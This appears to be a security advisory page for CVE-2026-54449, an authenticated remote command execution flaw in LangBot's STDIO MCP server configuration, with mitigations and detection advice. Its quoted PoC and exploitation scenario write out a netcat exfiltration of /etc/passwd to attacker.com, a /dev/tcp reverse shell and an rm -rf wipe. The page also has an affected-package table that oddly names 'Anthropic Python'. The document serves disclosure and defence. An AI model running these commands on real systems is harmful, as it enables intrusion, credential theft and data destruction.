CVE-2026-54449: LangBot: RCE via arbitrary STDIO MCP command

GHSA-3pvh-63gf-j9mw HIGH
Published July 15, 2026
CISO Take

LangBot, an AI agent/chatbot framework with nearly 6,000 downstream dependents, lets any authenticated user register a new 'STDIO' MCP tool server backed by an arbitrary shell command, which the platform then spawns as a subprocess with no sandboxing or input validation — full command execution (CVSS 8.8) behind nothing more than a valid login. There is no CISA KEV listing, EPSS score, or public Nuclei template yet, so mass exploitation isn't confirmed, but the exploit path is trivial: a UI form field, no chained bugs, no payload engineering, and researchers at ox.security have already flagged the underlying MCP StdioServerParameters pattern as a systemic risk across the wider MCP ecosystem, not just LangBot. Because any signed-up user — including a low-privilege trial account or one using stolen credentials — can pivot directly to reverse shells, credential theft, or destructive commands on the host, this behaves like unauthenticated RCE on any LangBot deployment with open registration. No patched version is listed yet (track GHSA-3pvh-63gf-j9mw), so until a fix ships, restrict MCP STDIO configuration to admin-only roles, disable self-service signup on internet-facing instances, and run LangBot in a sandboxed/containerized environment with no outbound network access from the MCP subprocess context. Detection teams should monitor for unexpected child processes spawned by the LangBot service account and for outbound connections initiated shortly after MCP configuration changes.

Sources: NVD GitHub Advisory ATLAS ox.security

What is the risk?

High risk. Exploitability is trivial once authenticated — no privilege escalation, chained vulnerability, or specialized AI/ML knowledge is required, only access to the Extensions/MCP UI. Impact is total: full OS command execution as the LangBot service user, enabling data exfiltration, reverse shells, lateral movement, or destructive wipes. Exposure is broad given langbot's 5,901 downstream dependents and the fact that any authenticated tier (including trial/free signups) can trigger the flaw. The absence of a KEV listing or public exploit code lowers immediate mass-exploitation risk, but the low barrier to exploitation and public PoC/video walkthrough mean opportunistic attacks are plausible within days of disclosure.

How does the attack unfold?

Initial Access
Attacker obtains an authenticated account on a public or network-reachable LangBot instance via self-signup or stolen credentials.
AML.T0012
Malicious Configuration
Attacker navigates to Extensions > MCP and adds a new STDIO MCP server configured with an arbitrary OS command.
AML.T0081
Command Execution
LangBot invokes the configured MCP tool via StdioServerParameters, spawning the attacker's command as a subprocess on the host.
AML.T0053
Impact
Attacker achieves arbitrary code execution, enabling reverse shell access, data exfiltration, lateral movement, or destructive actions on the host.
AML.T0072

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Anthropic Python pip <= 4.10.5 No patch
3.7K 5.9K dependents Pushed 5d ago 92% patched ~10d to patch Full package profile →

Do you use Anthropic Python? You're affected.

How severe is it?

CVSS 3.1
8.8 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C High
I High
A High

What should I do?

1 step
  1. Upgrade LangBot beyond 4.10.5 once a patched release is published (monitor GHSA-3pvh-63gf-j9mw for the fix version). Until patched: restrict MCP server configuration (Extensions > MCP > Add) to admin/trusted roles only via RBAC; disable open self-service signup on internet-facing LangBot instances; run LangBot in an isolated container/VM with minimal filesystem access and no direct outbound network egress from the process that executes MCP STDIO commands; audit existing MCP configurations for unexpected commands. For detection, alert on unexpected child processes spawned by the LangBot service account, unusual outbound connections following MCP config changes, and command patterns consistent with reverse shells or data exfiltration (nc, bash -i, curl|sh).

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.6 - AI system security
OWASP LLM Top 10
LLM07 - Insecure Plugin Design LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-54449?

LangBot, an AI agent/chatbot framework with nearly 6,000 downstream dependents, lets any authenticated user register a new 'STDIO' MCP tool server backed by an arbitrary shell command, which the platform then spawns as a subprocess with no sandboxing or input validation — full command execution (CVSS 8.8) behind nothing more than a valid login. There is no CISA KEV listing, EPSS score, or public Nuclei template yet, so mass exploitation isn't confirmed, but the exploit path is trivial: a UI form field, no chained bugs, no payload engineering, and researchers at ox.security have already flagged the underlying MCP StdioServerParameters pattern as a systemic risk across the wider MCP ecosystem, not just LangBot. Because any signed-up user — including a low-privilege trial account or one using stolen credentials — can pivot directly to reverse shells, credential theft, or destructive commands on the host, this behaves like unauthenticated RCE on any LangBot deployment with open registration. No patched version is listed yet (track GHSA-3pvh-63gf-j9mw), so until a fix ships, restrict MCP STDIO configuration to admin-only roles, disable self-service signup on internet-facing instances, and run LangBot in a sandboxed/containerized environment with no outbound network access from the MCP subprocess context. Detection teams should monitor for unexpected child processes spawned by the LangBot service account and for outbound connections initiated shortly after MCP configuration changes.

Is CVE-2026-54449 actively exploited?

No confirmed active exploitation of CVE-2026-54449 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-54449?

Upgrade LangBot beyond 4.10.5 once a patched release is published (monitor GHSA-3pvh-63gf-j9mw for the fix version). Until patched: restrict MCP server configuration (Extensions > MCP > Add) to admin/trusted roles only via RBAC; disable open self-service signup on internet-facing LangBot instances; run LangBot in an isolated container/VM with minimal filesystem access and no direct outbound network egress from the process that executes MCP STDIO commands; audit existing MCP configurations for unexpected commands. For detection, alert on unexpected child processes spawned by the LangBot service account, unusual outbound connections following MCP config changes, and command patterns consistent with reverse shells or data exfiltration (nc, bash -i, curl|sh).

What systems are affected by CVE-2026-54449?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, MCP tool integrations, AI agent orchestration.

What is the CVSS score for CVE-2026-54449?

CVE-2026-54449 has a CVSS v3.1 base score of 8.8 (HIGH).

What is the AI security impact?

Affected AI Architectures

agent frameworksMCP tool integrationsAI agent orchestration

MITRE ATLAS Techniques

AML.T0012 Valid Accounts
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0081 Modify AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.6
OWASP LLM Top 10: LLM07, LLM08

What are the technical details?

Original Advisory

### Summary Any authenticated user can achieve arbitrary command execution on the LangBot servers through changing the MCP Server Configuration by added an "STDIO" MCP with an arbitrary command. ### Details The repository uses StdioServerParameters which is based on Anthropic's modelcontextprotocol open source, inside the code - src/langbot/pkg/provider/tools/loaders/mcp.py - StdioServerParameters is imported from mcp, which executes a given command which runs a subprocess on the target machine. Since the LangBot services are authenticated, an attacker finding an open server needs to sign up or login via stolen credentials, then the attacker can use the MCP configuration to enter any arbitrary command, giving the ability to completely take over the machine. ### PoC 1. Open the LangBot server 2. Navigate to Extensions 3. Open the "MCP" tab and press "Add" 4. Choose an STDIO server configuration 5. Add any arbitrary command with arguments <img width="480" height="538" alt="Screenshot 2026-01-19 at 15 08 43" src="https://github.com/user-attachments/assets/c341afa8-68c0-4c34-b5b6-ad8796184bdd" /> Note that an attacker could use this configuration to enter any arbitrary command, including data exfiltration (cat /etc/passwd | nc attacker.com 4444), opening a reverse shell (bash -i >& /dev/tcp/10.0.0.1/8080 0>&1), potentially removing the whole machine's data (rm -rf / --no-preserve-root), and many more. ### Impact This is an authenticated remote code execution vulnerability (RCE), affecting any publicly available LangBot instance, and local instances when in the same network as the attacker (Lateral Movement). CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'). ### Video POC https://github.com/user-attachments/assets/4868d232-7453-442c-bffd-60f0ad4679ea ### Resources https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp/ https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem/

Exploitation Scenario

An attacker signs up for a free/trial account on a publicly reachable LangBot instance (or reuses stolen credentials). After logging in, they navigate to Extensions > MCP > Add and configure a new STDIO MCP server, entering a command such as `bash -i >& /dev/tcp/attacker-ip/8080 0>&1`. LangBot's provider layer instantiates this via StdioServerParameters and spawns the command as a subprocess on the host, handing the attacker an interactive reverse shell with the privileges of the LangBot service account. From there the attacker can dump credentials/config files, pivot to other services on the same network, or destroy data on the host.

Weaknesses (CWE)

CWE-77 — Improper Neutralization of Special Elements used in a Command ('Command Injection'): The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Implementation] If possible, ensure that all external commands called from the program are statically created.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
July 15, 2026
Last Modified
July 15, 2026
First Seen
July 15, 2026

Related Vulnerabilities